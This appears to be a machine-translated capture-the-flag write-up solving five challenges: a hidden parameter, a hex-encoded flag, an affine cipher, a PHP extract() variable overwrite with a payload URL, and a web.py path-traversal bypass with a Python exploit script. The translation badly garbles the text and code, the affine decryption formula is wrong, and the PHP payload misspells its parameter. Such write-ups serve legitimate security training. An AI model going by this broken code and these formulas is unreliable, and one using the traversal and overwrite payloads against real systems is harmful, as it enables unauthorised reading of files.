1.FirstBlood
<div the above mentioned id = "MyInfo"
class = "the Reveal-Modal" style = "Run the display: none;">
<h2> My Information </ h2> <blockquote>
<the p-> Team Name: Test User </ the p->
<the p- > slogan: FirstBl00d </ the p->
<- index.php / the User / updatevoice Voice = ->!?
<the p-> score: 300 </ the p->
<the p-> FLAG has been found: 3 </ the p->
</ blockquote>
<a class ="close-reveal-modal"> & # 215; </a>
</ div>
访问url/index.php/user/updatevoice?voice=FirstBlood
2. hexadecimal string
Open questions, tips:
This is a hexadecimal string, after untie know where the flag 666c61675f69735f686572657b3265346231303234613763386 3353432373139633637613064666333663432302e7068707d
Directly above digital converter thrown hex characters transformed into
3. Affine Cipher
Ciphertext: yfsfnhtzlsrftclhwrffonw
In the affine, a = 15, b = 23
The resulting plaintext submit:
Affine password rules is: c = (m * a + b)% 26
To obtain plaintext compared: m = (c - b * a ^ (- 1))% 26
algorithm:
# Coding. 8 = UTF- # greatest common divisor DEF egcd (A, B): IF A == 0: return (B, 0,. 1 ) the else : G , Y, X = egcd (A% B, A) return (G, X - (B // A) * Y, Y) # modulo inverse of DEF modinv (A, m): G , X, Y = egcd (A, m) IF G =. 1:! The raise Exception ( 'Not Modular inverse does exist' ) the else : return X% m # Euler function DEF EULAR (n-): COUNT = 0 for x in xrange(0,n): g,x,y = egcd(x,n) if g == 1: count = count + 1 return count # 仿射密码 def Affine_cipher(ciphertext,a,b): plantext = '' # 求逆元 fa = modinv(a,26) for x in ciphertext: if x == ' ': plantext += ' ' continue plantext += chr(ord('a')+((ord(x)-b)-ord('a'))*fa%26) return plantext
Call key obtained plaintext
4. Variable cover
<?php $filename = 'x'; extract($_GET); if(!empty($attempt)) { $conbination = trim(file_get_contents($filename)); if ($attempt === $conbination) { echo "<p>neirong" . "$conbination!?</p>"; require("flag.php"); echo "<p>congratulation,key is:" . "$flag<p>"; } else { echo "<p>Incorrenr!</p>"; } } ?>
payload:url?attempy=&filename=flag.php
5.web.py
def GET(self,filepath): if filepath.find("flag")>-1: return "Hacker" filepath = filepath.replace("../","") try: with open("./uploads/%s" % filepath,"rb") as f: content = f.read() return content except: return web.notfound("Sorry,the file you were looking for was not found.")
exp:
from requests import get def get_flag(): url = "" payload = url + ".../...//.../...//fla../g.txt" flag = get(payload).content return flag if __name__ == "__main__": flag = get_flag() print "[x] flag :" +flag